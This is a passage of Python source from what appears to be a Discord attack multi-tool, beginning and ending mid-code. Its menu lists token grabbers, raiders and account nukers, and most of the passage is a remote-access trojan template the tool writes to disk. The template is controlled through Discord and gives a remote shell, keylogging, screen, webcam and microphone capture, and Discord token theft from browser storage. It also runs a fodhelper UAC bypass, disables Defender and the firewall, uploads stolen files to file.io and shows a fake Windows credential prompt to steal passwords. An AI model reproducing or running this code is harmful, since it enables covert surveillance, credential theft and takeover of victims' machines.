r = requests.get('https://discord.com/api/v9/users/@me', headers=getheaders(usertoken)).json()
global username
username = r.get("username") + "#" + r.get("discriminator")
else:
os.system('cls' if os.name == 'nt' else 'clear')
title()
login()
def login():
global usertoken
usertoken = input(" Token: ")
checkvalidity()
os.system('cls' if os.name == 'nt' else 'clear')
title()
main()
def reset():
os.system('cls' if os.name == 'nt' else 'clear')
title()
def main():
print(f""" {username}> """, end="")
choice = input()
if choice == "tools":
print(f"""\n\tTool Name\tDescription\n\t----------\t------------\n\tselfbot\t\tA simple SelfBot\n\trat\t\tGenerate a RAT.py file\n\traid\t\tSimple Raid Tool\n\tservnuker\tSimple Server Nuker\n\tvidcrash\tVideoCrash Maker\n\tmassreport\tMassive Report a User\n\twspam\t\tSpam WebHooks\n\tfilegrab\tGenerate a TokenGrabber.py file\n\timggrab\t\tCreate a TokenGrabber Image\n\tqrgen\t\tCreate a Fake QrCode Token\n\tipgrab\t\tGrab any User IP\n\taccnuker\tDestroy a Account\n\tdacc\t\tDisable a Account\n\tinfo\t\tGet info of a Discord User\n\tautolog\t\tAutologin with Token\n\tnitrogen\tGenerate Discord Nitro\n\tnsniper\t\tNitro Sniper\n\tcleardm\t\tCLear your DM with a User\n\thousechanger\tChange HypeSquad House\n\tschanger\tStatue Changer\n\tcycle\t\tCycle Discord Color Theme\n\twremover\tDelete a WebHooks Link\n""")
main()
elif choice == "selfbot":
print(f"""\tNon-operational...\n""")
main()
elif choice == "rat":
def discordrat():
global filename, tokenbot
fileName = str(input(f"""\t[+] Enter the name you want to give to the final file: """))
tokenbot = str(input(f"""\t[+] Enter the token of the bot you will use to execute the RAT commands: """))
try:
with open(f"{fileName}.py", "w") as file:
file.write("""import winreg
import ctypes
import sys
import os
import ssl
import random
import threading
import time
import cv2
import subprocess
import discord
from comtypes import CLSCTX_ALL
from discord.ext import commands
from ctypes import *
import asyncio
import discord
from discord import utils
token = '~~TOKENHERE~~'
global appdata
appdata = os.getenv('APPDATA')
client = discord.Client()
bot = commands.Bot(command_prefix='!')
ssl._create_default_https_context = ssl._create_unverified_context
async def activity(client):
import time
import win32gui
while True:
global stop_threads
if stop_threads:
break
current_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
window_displayer = discord.Game(f"Visiting: {{current_window}}")
await client.change_presence(status=discord.Status.online, activity=window_displayer)
time.sleep(1)
def between_callback(client):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(activity(client))
loop.close()
@client.event
async def on_ready():
import platform
import re
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
flag = data['country_code']
ip = data['IPv4']
import os
total = []
global number
number = 0
global channel_name
channel_name = None
for x in client.get_all_channels():
total.append(x.name)
for y in range(len(total)):
if "session" in total[y]:
import re
result = [e for e in re.split("[^0-9]", total[y]) if e != '']
biggest = max(map(int, result))
number = biggest + 1
else:
pass
if number == 0:
channel_name = "session-1"
newchannel = await client.guilds[0].create_text_channel(channel_name)
else:
channel_name = f"session-{{number}}"
newchannel = await client.guilds[0].create_text_channel(channel_name)
channel_ = discord.utils.get(client.get_all_channels(), name=channel_name)
channel = client.get_channel(channel_.id)
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
value1 = f"@here :white_check_mark: New session opened {{channel_name}} | {{platform.system()}} {{platform.release()}} | :flag_{{flag.lower()}}: | User : {{os.getlogin()}}"
if is_admin == True:
await channel.send(f'{{value1}} | admin!')
elif is_admin == False:
await channel.send(value1)
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
def critproc():
import ctypes
ctypes.windll.ntdll.RtlAdjustPrivilege(20, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.RtlSetProcessIsCritical(1, 0, 0) == 0
def uncritproc():
import ctypes
ctypes.windll.ntdll.RtlSetProcessIsCritical(0, 0, 0) == 0
@client.event
async def on_message(message):
if message.channel.name != channel_name:
pass
else:
total = []
for x in client.get_all_channels():
total.append(x.name)
if message.content.startswith("!kill"):
try:
if message.content[6:] == "all":
for y in range(len(total)):
if "session" in total[y]:
channel_to_delete = discord.utils.get(client.get_all_channels(), name=total[y])
await channel_to_delete.delete()
else:
pass
else:
channel_to_delete = discord.utils.get(client.get_all_channels(), name=message.content[6:])
await channel_to_delete.delete()
await message.channel.send(f"[*] {{message.content[6:]}} killed.")
except:
await message.channel.send(f"[!] {{message.content[6:]}} is invalid,please enter a valid session name")
if message.content == "!dumpkeylogger":
import os
temp = os.getenv("TEMP")
file_keys = temp + r"\key_log.txt"
file = discord.File(file_keys, filename="key_log.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.popen(f"del {{file_keys}}")
if message.content == "!exit":
import sys
uncritproc()
sys.exit()
if message.content == "!windowstart":
import threading
global stop_threads
stop_threads = False
global _thread
_thread = threading.Thread(target=between_callback, args=(client,))
_thread.start()
await message.channel.send("[*] Window logging for this session started")
if message.content == "!windowstop":
stop_threads = True
await message.channel.send("[*] Window logging for this session stopped")
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
if message.content == "!screenshot":
import os
from mss import mss
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send("[*] Command successfuly executed", file=file)
os.remove(path)
if message.content == "!webcampic":
import os
import time
import cv2
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
#time.sleep(0.1)
return_value, image = camera.read()
cv2.imwrite(temp + r"\\temp.png", image)
del(camera)
file = discord.File(temp + r"\\temp.png", filename="temp.png")
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!message"):
import ctypes
import time
MB_YESNO = 0x04
MB_HELP = 0x4000
ICON_STOP = 0x10
def mess():
ctypes.windll.user32.MessageBoxW(0, message.content[8:], "Error", MB_HELP | MB_YESNO | ICON_STOP) #Show message box
import threading
messa = threading.Thread(target=mess)
messa._running = True
messa.daemon = True
messa.start()
import win32con
import win32gui
def get_all_hwnd(hwnd,mouse):
def winEnumHandler(hwnd, ctx):
if win32gui.GetWindowText(hwnd) == "Error":
win32gui.ShowWindow(hwnd, win32con.SW_RESTORE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_TOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_SHOWWINDOW + win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
return None
else:
pass
if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled(hwnd) and win32gui.IsWindowVisible(hwnd):
win32gui.EnumWindows(winEnumHandler,None)
win32gui.EnumWindows(get_all_hwnd, 0)
if message.content.startswith("!wallpaper"):
import ctypes
import os
path = os.path.join(os.getenv('TEMP') + r"\\temp.jpg")
await message.attachments[0].save(path)
ctypes.windll.user32.SystemParametersInfoW(20, 0, path , 0)
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!upload"):
await message.attachments[0].save(message.content[8:])
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!shell"):
global status
import time
status = None
import subprocess
import os
instruction = message.content[7:]
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
f1 = open(temp + r"\output.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
dele = "del" + temp + r"\output.txt"
os.popen(dele)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
status = None
if message.content.startswith("!download"):
import subprocess
import os
filename=message.content[10:]
check2 = os.stat(filename).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
response = requests.post('https://file.io/', files={{"file": open(filename, "rb")}}).json()["link"]
await message.channel.send("download link: " + response)
await message.channel.send("[*] Command successfuly executed")
else:
file = discord.File(message.content[10:], filename=message.content[10:])
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!cd"):
import os
os.chdir(message.content[4:])
await message.channel.send("[*] Command successfuly executed")
if message.content == "!help":
import os
temp = (os.getenv('TEMP'))
f5 = open(temp + r"\helpmenu.txt", 'a')
f5.write(str(helpmenu))
f5.close()
temp = (os.getenv('TEMP'))
file = discord.File(temp + r"\helpmenu.txt", filename="helpmenu.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\helpmenu.txt /f")
if message.content.startswith("!write"):
import pyautogui
if message.content[7:] == "enter":
pyautogui.press("enter")
else:
pyautogui.typewrite(message.content[7:])
if message.content == "!clipboard":
import ctypes
import os
CF_TEXT = 1
kernel32 = ctypes.windll.kernel32
kernel32.GlobalLock.argtypes = [ctypes.c_void_p]
kernel32.GlobalLock.restype = ctypes.c_void_p
kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p]
user32 = ctypes.windll.user32
user32.GetClipboardData.restype = ctypes.c_void_p
user32.OpenClipboard(0)
if user32.IsClipboardFormatAvailable(CF_TEXT):
data = user32.GetClipboardData(CF_TEXT)
data_locked = kernel32.GlobalLock(data)
text = ctypes.c_char_p(data_locked)
value = text.value
kernel32.GlobalUnlock(data_locked)
body = value.decode()
user32.CloseClipboard()
await message.channel.send("[*] Command successfuly executed : " + "Clipboard content is : " + str(body))
if message.content == "!sysinfo":
import platform
jak = str(platform.uname())
intro = jak[12:]
from requests import get
ip = get('https://api.ipify.org').text
pp = "IP Address = " + ip
await message.channel.send("[*] Command successfuly executed : " + intro + pp)
if message.content == "!geolocate":
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
link = f"http://www.google.com/maps/place/{data['latitude']},{data['longitude']}"
await message.channel.send("[*] Command successfuly executed : " + link)
if message.content == "!admincheck":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
await message.channel.send("[*] Congrats you're admin")
elif is_admin == False:
await message.channel.send("[!] Sorry, you're not admin")
if message.content == "!uacbypass":
import winreg
import ctypes
import sys
import os
import time
import inspect
def isAdmin():
try:
is_admin = (os.getuid() == 0)
except AttributeError:
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
return is_admin
if isAdmin():
await message.channel.send("Your already admin!")
else:
await message.channel.send("attempting to get admin!")
if message.content == "!uacbypass":
uncritproc()
test_str = sys.argv[0]
current_dir = inspect.getframeinfo(inspect.currentframe()).filename
cmd2 = current_dir
create_reg_path = \""" powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force \"""
os.system(create_reg_path)
create_trigger_reg_key = \""" powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force \"""
os.system(create_trigger_reg_key)
create_payload_reg_key = \"""powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start python \""" + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\\'"' + \""" -Force\"""
os.system(create_payload_reg_key)
class disable_fsr():
disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
def __enter__(self):
self.old_value = ctypes.c_long()
self.success = self.disable(ctypes.byref(self.old_value))
def __exit__(self, type, value, traceback):
if self.success:
self.revert(self.old_value)
with disable_fsr():
os.system("fodhelper.exe")
time.sleep(2)
remove_reg = \""" powershell Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force \"""
os.system(remove_reg)
if message.content == "!startkeylogger":
import base64
import os
from pynput.keyboard import Key, Listener
import logging
temp = os.getenv("TEMP")
log_dir = temp
logging.basicConfig(filename=(log_dir + r"\key_log.txt"),
level=logging.DEBUG, format='%%(asctime)s: %%(message)s')
def keylog():
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
import threading
global test
test = threading.Thread(target=keylog)
test._running = True
test.daemon = True
test.start()
await message.channel.send("[*] Keylogger successfuly started")
if message.content == "!stopkeylogger":
import os
test._running = False
await message.channel.send("[*] Keylogger successfuly stopped")
if message.content == "!idletime":
class LASTINPUTINFO(Structure):
_fields_ = [
('cbSize', c_uint),
('dwTime', c_int),
]
def get_idle_duration():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
if windll.user32.GetLastInputInfo(byref(lastInputInfo)):
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
else:
return 0
import threading
global idle1
idle1 = threading.Thread(target=get_idle_duration)
idle1._running = True
idle1.daemon = True
idle1.start()
duration = get_idle_duration()
await message.channel.send('User idle for %%.2f seconds.' % duration)
import time
time.sleep(1)
if message.content.startswith("!blockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(True)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content.startswith("!unblockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!streamwebcam" :
await message.channel.send("[*] Command successfuly executed")
import os
import time
import cv2
import threading
import sys
import pathlib
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
running = message.content
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
delelelee = "del " + file + r" /f"
os.system(delelelee)
os.system(r"RMDIR %temp%\hobo /s /q")
while True:
return_value, image = camera.read()
cv2.imwrite(temp + r"\\temp.png", image)
boom = discord.File(temp + r"\\temp.png", filename="temp.png")
kool = await message.channel.send(file=boom)
temp = (os.getenv('TEMP'))
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
del camera
break
else:
continue
if message.content == "!stopwebcam":
import os
os.system(r"mkdir %temp%\hobo")
os.system(r"echo hello>%temp%\hobo\hello.txt")
os.system(r"del %temp\\temp.png /F")
if message.content == "!getdiscordinfo":
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord": ROAMING + "\\\\Discord",
"Discord Canary": ROAMING + "\\\\discordcanary",
"Discord PTB": ROAMING + "\\\\discordptb",
"Google Chrome": LOCAL + "\\\\Google\\\\Chrome\\\\User Data\\\\Default",
"Opera": ROAMING + "\\\\Opera Software\\Opera Stable",
"Brave": LOCAL + "\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default",
"Yandex": LOCAL + "\\\\Yandex\\\\YandexBrowser\\\\User Data\\Default"
}
def getHeader(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
if token:
headers.update({"Authorization": token})
return headers
def getUserData(token):
try:
return loads(
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode())
except:
pass
def getTokenz(path):
path += "\\\\Local Storage\\\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def whoTheFuckAmI():
ip = "None"
try:
ip = urlopen(Request("https://ifconfig.me")).read().decode().strip()
except:
pass
return ip
def hWiD():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\\n")[1]
def getFriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships",
headers=getHeader(token))).read().decode())
except:
pass
def getChat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token),
data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def paymentMethods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources",
headers=getHeader(token))).read().decode())) > 0)
except:
pass
def sendMessages(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token,
"multipart/form-data; boundary=---------------------------325414537030329320151394843687"),
data=form_data.encode())).read().decode()
except:
pass
def main():
cache_path = ROAMING + "\\\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = whoTheFuckAmI()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in getTokenz(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getUserData(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(paymentMethods(token))
embed = f\"""
Email: {email}
Phone: {phone}
Nitro: {nitro}
Billing Info: {billing}
value: IP: {ip}
Username: {pc_username}
PC Name: {pc_name}
Token Location: {platform}
Token : {token}
username: {username} ({user_id})
\"""
return str(embed)
try:
embed = main()
await message.channel.send("[*] Command successfuly executed\\n"+str(embed))
except Exception as e:
pass
if message.content == "!streamscreen" :
await message.channel.send("[*] Command successfuly executed")
import os
from mss import mss
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
os.system(r"del %temp%\hobos\hellos.txt /f")
os.system(r"RMDIR %temp%\hobos /s /q")
else:
pass
while True:
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send(file=file)
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
break
else:
continue
if message.content == "!stopscreen":
import os
os.system(r"mkdir %temp%\hobos")
os.system(r"echo hello>%temp%\hobos\hellos.txt")
os.system(r"del %temp%\monitor.png /F")
if message.content == "!shutdown":
import os
uncritproc()
os.system("shutdown /p")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!restart":
import os
uncritproc()
os.system("shutdown /r /t 00")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!logoff":
import os
uncritproc()
os.system("shutdown /l /f")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!bluescreen":
import ctypes
import ctypes.wintypes
ctypes.windll.ntdll.RtlAdjustPrivilege(19, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.NtRaiseHardError(0xc0000022, 0, 0, 0, 6, ctypes.byref(ctypes.wintypes.DWORD()))
if message.content == "!currentdir":
import subprocess as sp
output = sp.getoutput('cd')
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("output is : " + output)
if message.content == "!displaydir":
import subprocess as sp
import time
import os
import subprocess
def shell():
output = subprocess.run("dir", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output22.txt"):
os.system(r"del %temp%\output22.txt /f")
f1 = open(temp + r"\output22.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output22.txt", filename="output22.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content == "!dateandtime":
import subprocess as sp
output = sp.getoutput(r'echo time = %time%% date = %%date%')
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("output is : " + output)
if message.content == "!listprocess":
import subprocess as sp
import time
import os
import subprocess
def shell():
output = subprocess.run("tasklist", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output.txt"):
os.system(r"del %temp%\output.txt /f")
f1 = open(temp + r"\output.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content.startswith("!prockill"):
import os
proc = message.content[10:]
kilproc = r"taskkill /IM" + ' "' + proc + '" ' + r"/f"
import time
import os
import subprocess
os.system(kilproc)
import subprocess
time.sleep(2)
process_name = proc
call = 'TASKLIST', '/FI', 'imagename eq %%s' % process_name
output = subprocess.check_output(call).decode()
last_line = output.strip().split('\\r\\n')[-1]
done = (last_line.lower().startswith(process_name.lower()))
if done == False:
await message.channel.send("[*] Command successfuly executed")
elif done == True:
await message.channel.send('[*] Command did not exucute properly')
if message.content.startswith("!recscreen"):
import cv2
import numpy as np
import pyautogui
reclenth = float(message.content[10:])
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
if input3 >= reclenth:
break
else:
continue
import os
SCREEN_SIZE = (1920, 1080)
fourcc = cv2.VideoWriter_fourcc(*"XVID")
temp = (os.getenv('TEMP'))
videeoo = temp + r"\output.avi"
out = cv2.VideoWriter(videeoo, fourcc, 20.0, (SCREEN_SIZE))
counter = 1
while True:
counter = counter + 1
img = pyautogui.screenshot()
frame = np.array(img)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out.write(frame)
if counter >= input2:
break
out.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.avi"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.avi /f")
else:
file = discord.File(check, filename="output.avi")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.avi /f")
if message.content.startswith("!reccam"):
import cv2
import numpy as np
import pyautogui
input1 = float(message.content[8:])
import cv2
import os
temp = (os.getenv('TEMP'))
vid_capture = cv2.VideoCapture(0)
vid_cod = cv2.VideoWriter_fourcc(*'XVID')
loco = temp + r"\output.mp4"
output = cv2.VideoWriter(loco, vid_cod, 20.0, (640,480))
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
ret,frame = vid_capture.read()
output.write(frame)
if input3 >= input1:
break
else:
continue
vid_capture.release()
output.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.mp4"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.mp4 /f")
else:
file = discord.File(check, filename="output.mp4")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.mp4 /f")
if message.content.startswith("!recaudio"):
import cv2
import numpy as np
import pyautogui
import os
import sounddevice as sd
from scipy.io.wavfile import write
seconds = float(message.content[10:])
temp = (os.getenv('TEMP'))
fs = 44100
laco = temp + r"\output.wav"
myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)
sd.wait()
write(laco, fs, myrecording)
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.wav"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.wav /f")
else:
file = discord.File(check, filename="output.wav")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.wav /f")
if message.content.startswith("!delete"):
global statue
import time
import subprocess
import os
instruction = message.content[8:]
instruction = "del " + '"' + instruction + '"' + " /F"
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
global statue
statue = "ok"
if statue:
numb = len(result)
if numb > 0:
await message.channel.send("[*] an error has occurred")
else:
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
statue = None
if message.content == "!disableantivirus":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import subprocess
instruction = \""" REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" | findstr /I /C:"CurrentBuildnumber" \"""
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
done = result.split()
boom = done[2:]
if boom <= ['17763']:
os.system(r"Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet")
await message.channel.send("[*] Command successfuly executed")
elif boom >= ['18362']:
os.system(r\"""powershell Add-MpPreference -ExclusionPath "C:\\\\" \""")
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] An unknown error has occurred")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!disablefirewall":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
os.system(r"NetSh Advfirewall set allprofiles state off")
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content.startswith("!audio"):
import os
temp = (os.getenv("TEMP"))
temp = temp + r"\audiofile.wav"
if os.path.isfile(temp):
delelelee = "del " + temp + r" /f"
os.system(delelelee)
temp1 = (os.getenv("TEMP"))
temp1 = temp1 + r"\sounds.vbs"
if os.path.isfile(temp1):
delelee = "del " + temp1 + r" /f"
os.system(delelee)
await message.attachments[0].save(temp)
temp2 = (os.getenv("TEMP"))
f5 = open(temp2 + r"\sounds.vbs", 'a')
result = \""" Dim oPlayer: Set oPlayer = CreateObject("WMPlayer.OCX"): oPlayer.URL = \""" + '"' + temp + '"' \""": oPlayer.controls.play: While oPlayer.playState <> 1 WScript.Sleep 100: Wend: oPlayer.close \"""
f5.write(result)
f5.close()
os.system(r"start %temp%\sounds.vbs")
await message.channel.send("[*] Command successfuly executed")
#if adding startup n stuff this needs to be edited to that
if message.content == "!selfdestruct": #prob beter way to do dis
import inspect
import os
import sys
import inspect
uncritproc()
cmd2 = inspect.getframeinfo(inspect.currentframe()).filename
hello = os.getpid()
bat = \"""@echo off\""" + " & " + "taskkill" + r" /F /PID " + str(hello) + " &" + " del " + '"' + cmd2 + '"' + r" /F" + " & " + r\"""start /b "" cmd /c del "%~f0"& taskkill /IM cmd.exe /F &exit /b\"""
temp = (os.getenv("TEMP"))
temp5 = temp + r"\delete.bat"
if os.path.isfile(temp5):
delelee = "del " + temp5 + r" /f"
os.system(delelee)
f5 = open(temp + r"\delete.bat", 'a')
f5.write(bat)
f5.close()
os.system(r"start /min %temp%\delete.bat")
if message.content == "!windowspass":
import sys
import subprocess
import os
cmd82 = "$cred=$host.ui.promptforcredential('Windows Security Update','',[Environment]::UserName,[Environment]::UserDomainName);"
cmd92 = 'echo $cred.getnetworkcredential().password;'
full_cmd = 'Powershell "{} {}"'.format(cmd82,cmd92)
instruction = full_cmd
def shell():
output = subprocess.run(full_cmd, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
return output
result = str(shell().stdout.decode('CP437'))
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("password user typed in is: " + result)
if message.content == "!displayoff":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
